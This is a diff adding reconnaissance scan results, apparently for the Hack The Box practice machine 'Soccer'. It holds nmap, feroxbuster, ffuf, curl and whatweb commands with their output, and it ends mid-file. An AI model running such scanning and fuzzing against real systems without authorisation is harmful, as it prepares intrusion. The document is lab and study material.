+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
+|   256 5797565def793c2fcbdb35fff17c615c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
+80/tcp   open  http            syn-ack nginx 1.18.0 (Ubuntu)
+|_http-title: Soccer - Index 
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+9091/tcp open  xmltec-xmlmail? syn-ack
+| fingerprint-strings: 
+|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix: 
+|     HTTP/1.1 400 Bad Request
+|     Connection: close
+|   GetRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 139
+|     Date: Fri, 27 Jan 2023 09:41:45 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot GET /</pre>
+|     </body>
+|     </html>
+|   HTTPOptions, RTSPRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 143
+|     Date: Fri, 27 Jan 2023 09:41:45 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot OPTIONS /</pre>
+|     </body>
+|_    </html>
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port9091-TCP:V=7.93%I=9%D=1/27%Time=63D39C53%P=x86_64-pc-linux-gnu%r(in
+SF:formix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r
+SF:\n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
+SF:20close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\
+SF:nContent-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Op
+SF:tions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCo
+SF:ntent-Length:\x20139\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\
+SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
+SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
+SF:head>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HT
+SF:TPOptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Pol
+SF:icy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\n
+SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\
+SF:r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:
+SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<me
+SF:ta\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>C
+SF:annot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HT
+SF:TP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-s
+SF:rc\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20
+SF:text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\
+SF:x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:\x20close\r\n\r\n
+SF:<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"u
+SF:tf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\
+SF:x20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad
+SF:\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F
+SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%
+SF:r(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnect
+SF:ion:\x20close\r\n\r\n")%r(Hello,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\
+SF:r\nConnection:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x2
+SF:0Request\r\nConnection:\x20close\r\n\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:42:18 2023 -- 1 IP address (1 host up) scanned in 46.59 seconds
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,71 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.194
+```
+
+[/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt](file:///home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Fri Jan 27 10:42:19 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.077s latency).
+Scanned at 2023-01-27 10:42:19 CET for 1s
+
+PORT   STATE SERVICE REASON  VERSION
+22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
+|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
+|   256 5797565def793c2fcbdb35fff17c615c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
+|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
+| ssh2-enum-algos: 
+|   kex_algorithms: (9)
+|       curve25519-sha256
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group16-sha512
+|       diffie-hellman-group18-sha512
+|       diffie-hellman-group14-sha256
+|   server_host_key_algorithms: (5)
+|       rsa-sha2-512
+|       rsa-sha2-256
+|       ssh-rsa
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (6)
+|       chacha20-poly1305@openssh.com
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|   mac_algorithms: (10)
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-sha1
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+| ssh-auth-methods: 
+|   Supported authentication methods: 
+|     publickey
+|_    password
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:42:20 2023 -- 1 IP address (1 host up) scanned in 1.54 seconds
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,24 @@
+```bash
+curl -sSikf http://10.10.11.194:80/robots.txt
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_curl-robots.txt](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_curl-robots.txt):
+
+```
+HTTP/1.1 301 Moved Permanently
+Server: nginx/1.18.0 (Ubuntu)
+Date: Fri, 27 Jan 2023 09:42:19 GMT
+Content-Type: text/html
+Content-Length: 178
+Connection: keep-alive
+Location: http://soccer.htb/robots.txt
+
+<html>
+<head><title>301 Moved Permanently</title></head>
+<body>
+<center><h1>301 Moved Permanently</h1></center>
+<hr><center>nginx/1.18.0 (Ubuntu)</center>
+</body>
+</html>
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,25 @@
+```bash
+curl -sSik http://10.10.11.194:80/
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_curl.html](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_curl.html):
+
+```
+HTTP/1.1 301 Moved Permanently
+Server: nginx/1.18.0 (Ubuntu)
+Date: Fri, 27 Jan 2023 09:42:19 GMT
+Content-Type: text/html
+Content-Length: 178
+Connection: keep-alive
+Location: http://soccer.htb/
+
+<html>
+<head><title>301 Moved Permanently</title></head>
+<body>
+<center><h1>301 Moved Permanently</h1></center>
+<hr><center>nginx/1.18.0 (Ubuntu)</center>
+</body>
+</html>
+
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,11 @@
+```bash
+feroxbuster -u http://10.10.11.194:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt):
+
+```
+WLD      GET        7l       12w      178c Got 301 for http://10.10.11.194/805749485a5b4fe19ef44e590a9b4ed2 (url length: 32)
+WLD         -         -         - http://10.10.11.194/805749485a5b4fe19ef44e590a9b4ed2 => http://soccer.htb/805749485a5b4fe19ef44e590a9b4ed2
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,24 @@
+```bash
+curl -sSikf http://10.10.11.194:80/.well-known/security.txt
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_known-security.txt](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_known-security.txt):
+
+```
+HTTP/1.1 301 Moved Permanently
+Server: nginx/1.18.0 (Ubuntu)
+Date: Fri, 27 Jan 2023 09:42:19 GMT
+Content-Type: text/html
+Content-Length: 178
+Connection: keep-alive
+Location: http://soccer.htb/.well-known/security.txt
+
+<html>
+<head><title>301 Moved Permanently</title></head>
+<body>
+<center><h1>301 Moved Permanently</h1></center>
+<hr><center>nginx/1.18.0 (Ubuntu)</center>
+</body>
+</html>
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,124 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.194
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Fri Jan 27 10:42:19 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.026s latency).
+Scanned at 2023-01-27 10:42:19 CET for 70s
+
+Bug in http-security-headers: no string output.
+PORT   STATE SERVICE REASON  VERSION
+80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
+|_http-fetch: Please enter the complete path of the directory to save data in.
+| http-referer-checker: 
+| Spidering limited to: maxpagecount=30
+|   https://cdn.jsdelivr.net:443/npm/bootstrap15.2.2/dist/js/bootstrap.bundle.min.js
+|   http://maxcdn.bootstrapcdn.com:80/bootstrap/4.1.1/js/bootstrap.min.js
+|   http://cdnjs.cloudflare.com:80/ajax/libs/jquery/3.2.1/jquery.min.js
+|_  https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js
+|_http-chrono: Request times for /; avg: 167.91ms; min: 157.46ms; max: 176.69ms
+|_http-mobileversion-checker: No mobile version detected.
+| http-sitemap-generator: 
+|   Directory structure:
+|     /
+|       Other: 1; jpg: 4
+|   Longest directory structure:
+|     Depth: 0
+|     Dir: /
+|   Total files found (by extension):
+|_    Other: 1; jpg: 4
+|_http-dombased-xss: Couldn't find any DOM based XSS.
+| http-headers: 
+|   Server: nginx/1.18.0 (Ubuntu)
+|   Date: Fri, 27 Jan 2023 09:42:28 GMT
+|   Content-Type: text/html
+|   Content-Length: 6917
+|   Last-Modified: Thu, 17 Nov 2022 08:07:11 GMT
+|   Connection: close
+|   ETag: "6375ebaf-1b05"
+|   Accept-Ranges: bytes
+|   
+|_  (Request type: HEAD)
+| http-vuln-cve2011-3192: 
+|   VULNERABLE:
+|   Apache byterange filter DoS
+|     State: VULNERABLE
+|     IDs:  CVE:CVE-2011-3192  BID:49303
+|       The Apache web server is vulnerable to a denial of service attack when numerous
+|       overlapping byte ranges are requested.
+|     Disclosure date: 2011-08-19
+|     References:
+|       https://seclists.org/fulldisclosure/2011/Aug/175
+|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
+|       https://www.securityfocus.com/bid/49303
+|_      https://www.tenable.com/plugins/nessus/55976
+|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+| http-comments-displayer: 
+| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=soccer.htb
+|     
+|     Path: http://soccer.htb:80/
+|     Line number: 145
+|     Comment: 
+|         <!-- /.container -->
+|     
+|     Path: http://soccer.htb:80/
+|     Line number: 142
+|     Comment: 
+|         <!-- /.row -->
+|     
+|     Path: http://soccer.htb:80/
+|     Line number: 106
+|     Comment: 
+|_        <!-- Page Content -->
+| http-vhosts: 
+|_128 names had status 301
+|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
+|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
+|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
+| http-php-version: Logo query returned unknown hash ad6ef659069e5f1721a5932f71942408
+|_Credits query returned unknown hash ad6ef659069e5f1721a5932f71942408
+|_http-title: Soccer - Index 
+|_http-errors: Couldn't find any error pages.
+|_http-csrf: Couldn't find any CSRF vulnerabilities.
+|_http-exif-spider: ERROR: Script execution failed (use -d to debug)
+|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
+|_http-date: Fri, 27 Jan 2023 09:42:28 GMT; 0s from local time.
+| http-useragent-tester: 
+|   Status for browser useragent: 200
+|   Allowed User Agents: 
+|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
+|     libwww
+|     lwp-trivial
+|     libcurl-agent/1.0
+|     PHP/
+|     Python-urllib/2.5
+|     GT::WWW
+|     Snoopy
+|     MFC_Tear_Sample
+|     HTTP::Lite
+|     PHPCrawl
+|     URI::Fetch
+|     Zend_Http_Client
+|     http client
+|     PECL::HTTP
+|     Wget/1.13.4 (linux-gnu)
+|_    WWW-Mechanize/1.34
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+|_http-config-backup: ERROR: Script execution failed (use -d to debug)
+|_http-feed: Couldn't find any feeds.
+|_http-malware-host: Host appears to be clean
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:43:30 2023 -- 1 IP address (1 host up) scanned in 70.83 seconds
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,11 @@
+```bash
+curl -sk -o /dev/null -H "Host: TftyUjcxjULDwbGIAAgk.soccer.htb" http://soccer.htb:80/ -w "%{size_download}"
+``````bash
+ffuf -u http://soccer.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.soccer.htb" -fs 178 -noninteractive -s | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt"
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt):
+
+```
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,116 @@
+```bash
+whatweb --color=never --no-errors -a 3 -v http://10.10.11.194:80 2>&1
+```
+
+[/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_whatweb.txt](file:///home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_whatweb.txt):
+
+```
+WhatWeb report for http://10.10.11.194:80
+Status    : 301 Moved Permanently
+Title     : 301 Moved Permanently
+IP        : 10.10.11.194
+Country   : RESERVED, ZZ
+
+Summary   : HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0], RedirectLocation[http://soccer.htb/]
+
+Detected Plugins:
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	OS           : Ubuntu Linux
+	String       : nginx/1.18.0 (Ubuntu) (from server string)
+
+[ RedirectLocation ]
+	HTTP Server string location. used with http-status 301 and
+	302
+
+	String       : http://soccer.htb/ (from location)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 301 Moved Permanently
+	Server: nginx/1.18.0 (Ubuntu)
+	Date: Fri, 27 Jan 2023 09:42:21 GMT
+	Content-Type: text/html
+	Content-Length: 178
+	Connection: close
+	Location: http://soccer.htb/
+
+WhatWeb report for http://soccer.htb/
+Status    : 200 OK
+Title     : Soccer - Index
+IP        : 10.10.11.194
+Country   : RESERVED, ZZ
+
+Summary   : Bootstrap[4.1.1], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], JQuery[3.2.1,3.6.0], nginx[1.18.0], Script, X-UA-Compatible[IE=edge]
+
+Detected Plugins:
+[ Bootstrap ]
+	Bootstrap is an open source toolkit for developing with
+	HTML, CSS, and JS.
+
+	Version      : 4.1.1
+	Version      : 4.1.1
+	Website     : https://getbootstrap.com/
+
+[ HTML5 ]
+	HTML version 5, detected by the doctype declaration
+
+
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	OS           : Ubuntu Linux
+	String       : nginx/1.18.0 (Ubuntu) (from server string)
+
+[ JQuery ]
+	A fast, concise, JavaScript that simplifies how to traverse
+	HTML documents, handle events, perform animations, and add
+	AJAX.
+
+	Version      : 3.2.1,3.6.0
+	Website     : http://jquery.com/
+
+[ Script ]
+	This plugin detects instances of script HTML elements and
+	returns the script language/type.
+
+
+[ X-UA-Compatible ]
+	This plugin retrieves the X-UA-Compatible value from the
+	HTTP header and meta http-equiv tag. - More Info:
+	http://msdn.microsoft.com/en-us/library/cc817574.aspx
+
+	String       : IE=edge
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.18.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 200 OK
+	Server: nginx/1.18.0 (Ubuntu)
+	Date: Fri, 27 Jan 2023 09:42:23 GMT
+	Content-Type: text/html
+	Last-Modified: Thu, 17 Nov 2022 08:07:11 GMT
+	Transfer-Encoding: chunked
+	Connection: close
+	ETag: W/"6375ebaf-1b05"
+	Content-Encoding: gzip
+
+
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Services/Service
@@ -0,0 +1,3 @@
+```bash
+wkhtmltoimage --format png http://10.10.11.194:80/ /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_screenshot.png
+```
--- a/HTB/soccer/results/scans/_commands.log
+++ b/HTB/soccer/results/scans/_commands.log
@@ -0,0 +1,24 @@
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.194
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.194
+
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.194
+
+feroxbuster -u http://10.10.11.194:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
+
+curl -sSikf http://10.10.11.194:80/.well-known/security.txt
+
+curl -sSikf http://10.10.11.194:80/robots.txt
+
+curl -sSik http://10.10.11.194:80/
+
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.194
+
+curl -sk -o /dev/null -H "Host: TftyUjcxjULDwbGIAAgk.soccer.htb" http://soccer.htb:80/ -w "%{size_download}"
+
+whatweb --color=never --no-errors -a 3 -v http://10.10.11.194:80 2>&1
+
+wkhtmltoimage --format png http://10.10.11.194:80/ /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_screenshot.png
+
+ffuf -u http://soccer.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.soccer.htb" -fs 178 -noninteractive -s | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt"
+
--- a/HTB/soccer/results/scans/_full_tcp_nmap.txt
+++ b/HTB/soccer/results/scans/_full_tcp_nmap.txt
@@ -0,0 +1,96 @@
+# Nmap 7.93 scan initiated Fri Jan 27 10:41:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.056s latency).
+Scanned at 2023-01-27 10:41:32 CET for 50s
+Not shown: 65532 closed tcp ports (conn-refused)
+PORT     STATE SERVICE         REASON  VERSION
+22/tcp   open  ssh             syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
+|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
+|   256 5797565def793c2fcbdb35fff17c615c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
+80/tcp   open  http            syn-ack nginx 1.18.0 (Ubuntu)
+|_http-title: Soccer - Index 
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+9091/tcp open  xmltec-xmlmail? syn-ack
+| fingerprint-strings: 
+|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix: 
+|     HTTP/1.1 400 Bad Request
+|     Connection: close
+|   GetRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 139
